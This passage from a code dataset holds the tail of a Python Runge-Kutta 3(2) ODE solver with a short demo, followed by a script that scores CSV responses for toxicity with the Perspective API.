matlab)\ndef rk32fstep(f, t0, y0, h):\n    \"\"\"\n    f: right-hand side of the equation\n    t0, y0: initial point of the step\n    h: step-size\n\n    Butcher tableau:\n        0   |\n        1   | 1\n        1/2 | 1/4  1/4\n        ----+---------------\n        y2  | 1/2  1/2\n        y1  | 1/6  1/6  2/3\n    \"\"\"\n    c2 = 1\n    c3 = 1/2\n\n    a21 = 1\n    a31 = 1/4\n    a32 = 1/4\n\n    b11 = 1/2\n    b12 = 1/2\n    b21 = 1/6\n    b22 = 1/6\n    b23 = 2/3\n\n    t1 = t0 + c2 * h\n    t2 = t0 + c3 * h\n\n    k1 = f(t0, y0)\n    k2 = f(t1, y0 + a21 * h * k1)\n    k3 = f(t2, y0 + a31 * h * k1 + a32 * h * k2)\n\n    # Approximation by the main method of order 3 at t0 + h\n    y1 = y0 + b21 * h * k1 + b22 * h * k2 + b23 * h * k3\n    # Approximation by the embedded estimator of order 2 at t0 + h\n    y2 = y0 + b11 * h * k1 + b12 * h * k2\n\n    # Error estimate: difference of the two approximations\n    err = y1 - y2\n\n    return y1, err\n
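\n\nif __name__ == '__main__':\n    # Illustrative demo (added, not part of the original file): integrate the\n    # test problem y' = -y, y(0) = 1 on [0, 2] with rk32f and compare against\n    # the exact solution exp(-t). Tolerance and hmax are arbitrary samples.\n    T_demo, Y_demo, st_demo = rk32f(lambda t, y: -y, 0.0, np.array([1.0]), 2.0, 0.5, 1e-6)\n    print('steps:', st_demo.nsteps, 'rejected:', st_demo.nrej, 'f evals:', st_demo.nfevals)\n    print('max abs error:', np.max(np.abs(Y_demo[0] - np.exp(-T_demo))))\n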
","repo_name":"sabzero43/numerical-methods","sub_path":"task8/ode.py","file_name":"ode.py","file_ext":"py","file_size_in_byte":8349,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"37857410158","text":"import yaml\nimport json\nimport pandas as pd\nfrom tqdm import tqdm\nimport time\nfrom googleapiclient import discovery\nfrom argparse import ArgumentParser\n\nATTRIBUTE = 'TOXICITY'\nNAME_NEW_COL = 'pro_API_response_score'\nTIME_INTERVAL = .8  # Perspective API limits the QPS (queries per second) to 1; see https://console.cloud.google.com/iam-admin/quotas for quota alerts\nTRIALS = 4  # number of passes over the entire dataset\nBACKUP_EVERY = 25\n\n\ndef read_credential():\n    with open('credentials.yaml', \"r\") as ymlfile:\n        cfg = yaml.safe_load(ymlfile)\n\n    return cfg['google_cloud']\n\n\ndef get_status(df):\n    return f\"{sum(df[NAME_NEW_COL] != -1)}/{len(df)}\"\n\n\ndef main(path_to_df):\n    API_KEY = read_credential()\n    client = discovery.build(\n        \"commentanalyzer\",\n        \"v1alpha1\",\n        developerKey=API_KEY,\n        discoveryServiceUrl=\"https://commentanalyzer.googleapis.com/$discovery/rest?version=v1alpha1\",\n        static_discovery=False,\n    )\n\n    df = pd.read_csv(path_to_df, index_col=0)\n    # create column w/ -1 scores as default\n    if NAME_NEW_COL not in df.columns:\n        df[NAME_NEW_COL] = -1\n\n    consecutive_err = 0\n    count = 0  # total values obtained during execution\n\n    print(f\"Restored from {get_status(df)}\")\n    n_response = 0\n\n    for _ in range(TRIALS):\n        pbar = tqdm(\n            enumerate(df.iterrows()),\n            desc=f\"status: {get_status(df)} | from last backup: {n_response} | last_backup: NaN\",\n            total=len(df),\n        )\n\n        for it, (idx, row) in pbar:\n            # if no score is assigned yet:\n            if row[NAME_NEW_COL] < 0:\n                time.sleep(TIME_INTERVAL)\n                analyze_request = {\n                    'comment': {'text': row['responses']},\n                    'requestedAttributes': {ATTRIBUTE: {}},\n                }\n\n                # catch HTTP errors\n                try:\n                    response = client.comments().analyze(body=analyze_request).execute()\n                    # assign score\n                    df.at[idx, NAME_NEW_COL] = response['attributeScores'][ATTRIBUTE]['summaryScore']['value']\n                    n_response += 1\n                    count += 1\n                    consecutive_err = 0  # reset the counter of errors in a row\n                except Exception as e:\n                    consecutive_err += 1\n                    if 'LANGUAGE_NOT_SUPPORTED_BY_ATTRIBUTE' in str(e):\n                        # unsupported language: mark as NA so the row is not retried\n                        df.at[idx, NAME_NEW_COL] = pd.NA\n                    # on other (e.g. HTTP) errors keep -1 and retry on a later pass\n\n            # stop early once every row has a score\n            if sum(df[NAME_NEW_COL] == -1) == 0:\n                print('\n[x] No more scores to get')\n                break\n\n            # backup, overwrite\n            if it % BACKUP_EVERY == 0:\n                df.to_csv(path_to_df)\n                pbar.set_description(f\"status: {get_status(df)} | from last backup: {n_response}/{BACKUP_EVERY} | last_backup: {it}it\")\n                n_response = 0\n\n        print(f'total scores obtained this loop: {count}')\n        print()\n\n    print(f'total scores in df: {get_status(df)}')\n    print(f'total valid scores in df: {sum(df[NAME_NEW_COL] > 0)}/{len(df)}')\n    # save csv\n    df.to_csv(path_to_df)\n\n\nif __name__ == \"__main__\":\n    # Usage: python prospectiveAPI_script.py -p path/to/data.csv\n    parser = ArgumentParser(description='Score a CSV of responses with the Perspective API.')\n    parser.add_argument('-p', '--path', required=True,\n                        help='Path to the CSV file')\n    args = parser.parse_args()\n    path_to_df = args.path\n\n    main(path_to_df)","repo_name":"DanielSc4/RewardLM","sub_path":"rewardlm/data/prospectiveAPI_script.py","file_name":"prospectiveAPI_script.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"}